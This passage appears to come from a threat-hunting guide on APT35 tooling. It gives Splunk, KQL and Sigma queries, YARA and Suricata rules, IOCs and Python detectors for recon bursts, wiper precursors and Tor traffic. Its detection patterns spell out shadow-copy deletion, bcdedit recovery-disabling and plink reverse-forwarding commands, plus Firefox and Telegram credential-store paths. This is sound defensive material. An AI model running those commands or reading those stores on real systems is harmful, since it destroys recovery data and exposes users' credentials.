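    r'plink.exe -restrict-acl -ssh admin@10.0.0.20',
    r'powershell.exe -NoProfile -Command "Get-Content -Raw C:\notes\plink.txt"',
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(triage_plink(cmd))
```

The first sample is the shape of a pivot: RDP on the compromised host exposed on the attacker's box, no shell, non-interactive, password inline. The second is an administrator running a command over SSH and scores low, and the third shows why exact token matching matters, since -restrict-acl would satisfy a substring match on -R.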
T1555.003 — Credentials from Password Stores: Credentials from Web Browsers (Credential Access) [P2]
Sagheb RAT steals Firefox saved logins (logins.json together with the key4.db or legacy key3.db key store) and Telegram Desktop session data (the tdata folder); the Telegram theft maps to the parent T1555
Splunk SPL:
index=* ((sourcetype=sysmon EventCode=10 TargetImage="*\\firefox.exe" CallTrace="*unknown*") OR (sourcetype="WinEventLog:Security" EventCode=4663 (ObjectName="*\\logins.json" OR ObjectName="*\\key4.db" OR ObjectName="*\\key3.db" OR ObjectName="*\\cookies.sqlite" OR ObjectName="*\\Telegram Desktop\\tdata\\*")))
Elastic KQL:
(event.code:10 AND winlog.event_data.TargetImage:*firefox.exe AND winlog.event_data.CallTrace:*unknown*) OR (event.code:4663 AND file.path:(*logins.json OR *key4.db OR *key3.db OR *cookies.sqlite OR *tdata*) AND NOT process.name:(firefox.exe OR Telegram.exe))
Monitor for processes other than the browser and Telegram themselves touching Firefox profile directories and the Telegram tdata folder. 4663 only fires where a SACL exists, so enable object access auditing on those paths before relying on this hunt.
T1485 — Data Destruction (Impact) [P1]
Shamoon 4.0 wiper deployed against Saudi energy infrastructure, wiping 15,000 workstations
Splunk SPL:
index=* ((sourcetype="WinEventLog:Security" EventCode=1102) OR (EventCode=4688 (CommandLine="*vssadmin*delete*shadows*" OR CommandLine="*wbadmin*delete*catalog*" OR CommandLine="*bcdedit*recoveryenabled*no*" OR CommandLine="*wmic*shadowcopy*delete*")) OR (EventCode=4663 ObjectName="*$MFT*"))
Elastic KQL:
event.code:1102 OR (event.code:4688 AND process.command_line:(*vssadmin* OR *wbadmin* OR *bcdedit* OR *shadowcopy*)) OR (event.code:4663 AND file.path:*$MFT*)
Sigma Rule:
```yaml
title: Shamoon Wiper Precursor Activity
author: Unknown
status: experimental
description: Detects recovery-destroying commands and audit-log clearing consistent with wiper preparation
logsource:
  product: windows
  service: security
detection:
  selection_recovery:
    EventID: 4688
    CommandLine|contains:
      - 'vssadmin delete shadows'
      - 'wmic shadowcopy delete'
      - 'wbadmin delete catalog'
      - 'bcdedit /set'
  selection_recovery_flag:
    CommandLine|contains: 'recoveryenabled no'
  selection_logclear:
    EventID: 1102
  selection_mft:
    EventID: 4663
    ObjectName|contains: '$MFT'
  condition: (selection_recovery and not (selection_recovery and not selection_recovery_flag and CommandLine|contains: 'bcdedit')) or selection_logclear or selection_mft
falsepositives:
  - Legitimate administrative activity, backup software rotating shadow copies
level: critical
tags:
  - attack.impact
  - attack.t1485
  - attack.t1490
```
Immediate isolation required on detection; check for lateral movement from the detected host. Earlier Shamoon variants wrote to raw disk through the signed EldoS RawDisk driver, so a Sysmon driver-load event (Event ID 6) for that signer on a workstation is a strong precursor to hunt alongside the commands above.
T1082 — System Information Discovery (Discovery) [P2]
Extensive infrastructure mapping including SCADA identification and backup system documentation
Splunk SPL:
index=* (EventCode=4688 OR EventCode=1) (CommandLine IN (*systeminfo*, *ipconfig /all*, *net view*, *netstat -an*, *arp -a*, *nbtstat*, *Get-WmiObject*, *Get-CimInstance*)) | bucket span=1h _time | stats dc(CommandLine) as unique_recon_commands by ComputerName, _time | where unique_recon_commands > 5
Elastic KQL:
process.command_line:(*systeminfo* OR "ipconfig /all" OR "net view" OR "netstat -an" OR "arp -a" OR *nbtstat* OR *Get-WmiObject* OR *Get-CimInstance*) (KQL only filters; for the per-host burst count use ES|QL: FROM logs-* | WHERE process.command_line RLIKE ".*(systeminfo|ipconfig /all|net view|netstat -an|arp -a|nbtstat|Get-WmiObject|Get-CimInstance).*" | EVAL hour = DATE_TRUNC(1 hour, @timestamp) | STATS n = COUNT_DISTINCT(process.command_line) BY host.name, hour | WHERE n > 5)
Focus on OT/IT boundary systems and jump boxes. Rapid enumeration indicates reconnaissance.
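Both aggregations in this hunt, many distinct reconnaissance commands on one host within an hour (T1082) and the same recovery-killing command landing on many hosts within minutes (the T1485 precursor described above and in the Shamoon Precursors paragraph of the article), are the same sliding-window problem with the group key swapped. The following is an added example written for this page, not code from the hunt guide or from any vendor. It classifies process-creation command lines into families, then scans a sliding window per host (recon burst) or per family (destructive fan-out). The event tuples, host names and thresholds are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

RECON = {
    "systeminfo": r"\bsysteminfo\b",
    "ipconfig_all": r"\bipconfig\b.*/all",
    "net_view": r"\bnet1?\s+view\b",
    "netstat": r"\bnetstat\b",
    "arp": r"\barp\b\s+-a",
    "nbtstat": r"\bnbtstat\b",
    "wmi_cim": r"Get-(Wmi|Cim)(Object|Instance)",
}
DESTRUCTIVE = {
    "vss_delete": r"vssadmin(\.exe)?\s+delete\s+shadows",
    "wmic_shadowcopy": r"wmic(\.exe)?\s+shadowcopy\s+delete",
    "wbadmin_catalog": r"wbadmin(\.exe)?\s+delete\s+catalog",
    "bcdedit_recovery": r"bcdedit(\.exe)?\s+/set\b.*recoveryenabled\s+no",
}


def classify(cmdline, patterns):
    """Return the first family whose pattern matches the command line, else None."""
    for name, rx in patterns.items():
        if re.search(rx, cmdline, re.IGNORECASE):
            return name
    return None


def first_window(items, window, min_distinct):
    """items: sorted (ts, value). Return (start, sorted values) for the first window that
    holds min_distinct distinct values; sliding, so a burst straddling the hour still counts."""
    for i, (t0, _) in enumerate(items):
        vals = {v for t, v in items[i:] if t - t0 <= window}
        if len(vals) >= min_distinct:
            return t0, sorted(vals)
    return None


def recon_bursts(events, window=timedelta(hours=1), min_distinct=5):
    """T1082: many distinct recon families on one host inside the window."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        fam = classify(cmd, RECON)
        if fam:
            by_host[host].append((ts, fam))
    hits = []
    for host, items in by_host.items():
        found = first_window(sorted(items), window, min_distinct)
        if found:
            hits.append({"host": host, "start": found[0], "families": found[1]})
    return hits


def destructive_fanout(events, window=timedelta(minutes=15), min_hosts=3):
    """T1485 precursor: the same recovery-killing family on many hosts inside the window."""
    by_family = defaultdict(list)
    for ts, host, cmd in events:
        fam = classify(cmd, DESTRUCTIVE)
        if fam:
            by_family[fam].append((ts, host))
    hits = []
    for fam, items in by_family.items():
        found = first_window(sorted(items), window, min_hosts)
        if found:
            hits.append({"family": fam, "start": found[0], "hosts": found[1]})
    return hits


# Constructed process-creation events (timestamp, host, command line); not real telemetry.
T0 = datetime(2026, 1, 20, 9, 0)
SAMPLE_EVENTS = [
    (T0, "JUMP01", "systeminfo"),
    (T0 + timedelta(minutes=3), "JUMP01", "ipconfig /all"),
    (T0 + timedelta(minutes=5), "JUMP01", "net view /domain"),
    (T0 + timedelta(minutes=9), "JUMP01", "netstat -an"),
    (T0 + timedelta(minutes=14), "JUMP01", "arp -a"),
    (T0 + timedelta(hours=2), "WS-7", "ipconfig /all"),                 # one command, not a burst
    (T0 + timedelta(hours=5), "WS-101", "vssadmin.exe delete shadows /all /quiet"),
    (T0 + timedelta(hours=5, minutes=1), "WS-102", "vssadmin.exe delete shadows /all /quiet"),
    (T0 + timedelta(hours=5, minutes=4), "WS-103", "vssadmin.exe delete shadows /all /quiet"),
    (T0 + timedelta(hours=6), "SRV-BK1", "bcdedit /set {default} recoveryenabled no"),  # single host
]

if __name__ == "__main__":
    print(recon_bursts(SAMPLE_EVENTS))
    print(destructive_fanout(SAMPLE_EVENTS))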
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| malware | BellaCiao | C#/.NET implant with DNS tasking; installs as a Windows service and drops a webshell |
| malware | Sagheb RAT | Native code keylogger with TOR-routed C2; steals Firefox and Telegram credentials |
| tool | plink.exe | PuTTY command-line SSH client used for reverse port forwarding |
| malware | Shamoon 4.0 | Wiper deployed against the Saudi energy sector |
| cve | CVE-2021-31207, CVE-2021-34523, CVE-2021-34473 | ProxyShell chain on Microsoft Exchange |
| cve | CVE-2012-1823 | PHP-CGI argument injection |
IOC Sweep Queries (Splunk). Family names are not file names, so these sweeps only catch samples that kept a telling name or the historical Shamoon service name; the behavioural hunts above are the primary control.
index=* (FileName="*bellaciao*" OR Image="*bellaciao*" OR ServiceName="*bellaciao*")
index=* (FileName="*sagheb*" OR Image="*sagheb*")
index=* (Image="*\\plink.exe" OR CommandLine="*plink*")
index=* (Image="*\\disttrack*" OR ServiceName="ntssrv" OR FileName="*shamoon*")
YARA Rules
These are heuristic hunting rules, not vendor signatures: the sources describe behaviour, not byte patterns, so the strings below are the API and file names that behaviour implies. The original BellaCiao rule also matched any 32-to-64 character alphanumeric run and any .tk/.ml/.ga/.cf domain, which fires on most binaries; both have been removed.
APT35_BellaCiao_Webshell — Detects a .NET service implant with DNS-based tasking and an HTTP secret header
```yara
rule APT35_BellaCiao_Webshell {
    meta:
        description = "Heuristic for BellaCiao-style .NET service implant with DNS tasking"
        author = "Unknown"
        date = "2024-01-07"
        reference = "https://www.cloudsek.com/blog/kitten-had-the-map-all-along-raising-gcc-tensions-the-pre-positioning-map"
    strings:
        $s1 = "ServiceBase" ascii             // System.ServiceProcess.ServiceBase type reference
        $s2 = "GetHostAddresses" ascii        // System.Net.Dns resolution for the DNS channel
        $s3 = "DnsQuery" ascii                // Win32 DNS API if P/Invoked instead
        $s4 = "WebRequest" ascii
        $s5 = "X-Authorization" ascii wide    // assumed name of the secret header; not confirmed by the sources
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and 3 of ($s*)
}
```
APT35_Sagheb_RAT — Detects Sagheb RAT based on TOR proxy usage and Firefox/Telegram credential theft strings
```yara
rule APT35_Sagheb_RAT {
    meta:
        description = "Heuristic for APT35 Sagheb RAT keylogger"
        author = "Unknown"
        date = "2024-01-07"
    strings:
        $s1 = "tor.exe" nocase ascii wide
        $s2 = "127.0.0.1:9050" ascii wide       // default TOR SOCKS port
        $s3 = "logins.json" nocase ascii wide   // Firefox saved logins
        $s4 = "key3.db" nocase ascii wide       // legacy Firefox key store
        $s5 = "key4.db" nocase ascii wide       // current Firefox key store
        $s6 = "Telegram Desktop" nocase ascii wide
        $s7 = "tdata" nocase ascii wide         // Telegram session folder
        $pdb = /C:\\Users\\[^\\]+\\source\\repos\\Sagheb/ ascii   // assumed build path; unconfirmed
    condition:
        uint16(0) == 0x5a4d and filesize < 2MB and (4 of ($s*) or $pdb)
}
```
Suricata Rules
These are local rules (SIDs in the 1000000+ local range) written in Emerging Threats style; they are not taken from the ET ruleset.
SID 1000001 — ProxyShell path-confusion request (the Email=autodiscover marker sits in the URI query, not in a header, so the original http_header match on X-Rps-CAT never fired)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"LOCAL EXPLOIT ProxyShell Autodiscover Path Confusion"; flow:to_server,established; http.uri.raw; content:"/autodiscover/autodiscover.json"; nocase; content:"Email=autodiscover/autodiscover.json"; nocase; distance:0; reference:cve,2021-34473; classtype:attempted-admin; sid:1000001; rev:2;)
SID 1000002 — DNS query for a watch-listed BellaCiao tasking domain. Suricata cannot express "once every 24 hours", so the periodicity check belongs in the SIEM; this rule confirms hits against a domain list (apt35_dns.lst, one base64-encoded FQDN per line, as Suricata string datasets require) built from your own hunting rather than an invented TLD.
alert dns $HOME_NET any -> any any (msg:"LOCAL TROJAN Watch-listed BellaCiao DNS domain"; dns.query; dataset:isset,apt35_dns,type string,load apt35_dns.lst; reference:url,cloudsek.com; classtype:trojan-activity; sid:1000002; rev:2;)
SID 1000003 — Possible TOR OR-port connection from an internal host (port heuristic only; 9050/9051 are the client's local SOCKS and control ports and are not seen on the wire, and flags:S cannot be combined with an established flow)
alert tcp $HOME_NET any -> $EXTERNAL_NET [9001,9030] (msg:"LOCAL POLICY Possible TOR OR-port connection"; flow:to_server; flags:S; reference:url,torproject.org; classtype:policy-violation; sid:1000003; rev:2;)
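The port-based rule above, and the exit-list blocking recommended earlier in the article and checklist, both miss how Tor actually looks from inside a network: a client talks to guard and middle relays on whatever OR port they advertise, and exit addresses only ever show up as the source of inbound connections. The following is an added example written for this page, not code from the hunt guide or from the Tor Project, that indexes relay data in the shape of the Tor Project's Onionoo details document (the field names or_addresses, exit_addresses and flags are real; the relays and firewall events are constructed, with documentation addresses) and classifies firewall events accordingly.

```python
import json

# Constructed relay data shaped like an Onionoo "details" response; fictitious relays.
ONIONOO_SAMPLE = json.dumps({"relays": [
    {"nickname": "guardA", "or_addresses": ["203.0.113.5:9001", "[2001:db8::5]:9001"],
     "flags": ["Fast", "Guard", "Running", "Stable", "Valid"]},
    {"nickname": "exitB", "or_addresses": ["198.51.100.8:443"],
     "exit_addresses": ["198.51.100.9"], "flags": ["Exit", "Fast", "Running", "Valid"]},
]})


def _split_addr(addr):
    """'1.2.3.4:9001' or '[2001:db8::5]:9001' -> (ip, port)."""
    ip, _, port = addr.rpartition(":")
    return ip.strip("[]"), int(port)


def build_index(onionoo_json):
    """Index relays by OR endpoint (client side), relay IP, and exit IP (inbound side)."""
    or_endpoints, relay_ips, exit_ips = {}, set(), set()
    for relay in json.loads(onionoo_json)["relays"]:
        ips = []
        for addr in relay.get("or_addresses", []):
            ip, port = _split_addr(addr)
            or_endpoints[(ip, port)] = relay["nickname"]
            ips.append(ip)
        relay_ips.update(ips)
        if "Exit" in relay.get("flags", []):
            exit_ips.update(ips)                          # exits usually egress from the OR address
            exit_ips.update(relay.get("exit_addresses", []))  # unless they advertise a separate one
    return {"or_endpoints": or_endpoints, "relay_ips": relay_ips, "exit_ips": exit_ips}


def classify(event, index):
    """event: {"dir": "in"|"out", "src": ip, "dst": ip, "dport": int} from a firewall log."""
    if event["dir"] == "out":
        if (event["dst"], event["dport"]) in index["or_endpoints"]:
            return "tor_client_to_relay"       # internal host speaking to a relay's OR port
        if event["dst"] in index["relay_ips"]:
            return "relay_ip_other_service"    # relay host on another port: weak, verify
        return None
    if event["src"] in index["exit_ips"]:
        return "inbound_via_tor_exit"          # someone reaching us anonymously
    return None


# Constructed firewall events: guard OR port, exit relay's OR port on 443, inbound from an
# exit address, a relay IP on port 80, and port 9001 to a host that is not a relay at all.
FW_SAMPLE = [
    {"dir": "out", "src": "10.0.0.5", "dst": "203.0.113.5", "dport": 9001},
    {"dir": "out", "src": "10.0.0.5", "dst": "198.51.100.8", "dport": 443},
    {"dir": "in", "src": "198.51.100.9", "dst": "10.0.0.80", "dport": 443},
    {"dir": "out", "src": "10.0.0.7", "dst": "203.0.113.5", "dport": 80},
    {"dir": "out", "src": "10.0.0.7", "dst": "192.0.2.44", "dport": 9001},
]


def classify_all(events, onionoo_json=ONIONOO_SAMPLE):
    index = build_index(onionoo_json)
    return [classify(e, index) for e in events]


if __name__ == "__main__":
    for event, verdict in zip(FW_SAMPLE, classify_all(FW_SAMPLE)):
        print(verdict, event)
```

The second event is the one a port rule misses and an exit-only list mislabels: an internal host connecting to an exit relay's OR port on 443 is a Tor client, not an inbound exit hit. The last event shows the opposite failure, a connection on 9001 to an address that is not a relay, which the port heuristic would alert on. Refresh the relay index at least hourly, since relays join and leave the consensus continuously.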
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| IIS logs | T1190, T1505.003 | Required for Exchange/web server exploitation detection. IIS does not record request bodies; make sure cs-uri-query is logged in full and add custom header fields if the webshell password header is to be hunted. |
| Windows Security Event Logs | T1190, T1555, T1485, T1082 | Enable process creation (4688) with command line auditing, and object access auditing (4663) with SACLs on the browser and Telegram profile paths. |
| Windows System Event Log | T1543.003, T1505.003 | Service installation (7045) is written to the System log, not Security. |
| Sysmon | T1572, T1003, T1082 | Deploy Sysmon with SwiftOnSecurity config minimum. Critical for process injection and network connection monitoring. |
| DNS logs | T1071.004 | Required for BellaCiao C2 detection. Must capture all DNS queries with timestamps for pattern analysis. |
| Exchange logs | T1190 | MSExchange Management, OWAHealth, and RPC Client Access logs required for ProxyShell detection. |
| PowerShell logs | T1082 | Enable ScriptBlock logging (Event ID 4104) and Module logging for discovery activity detection. |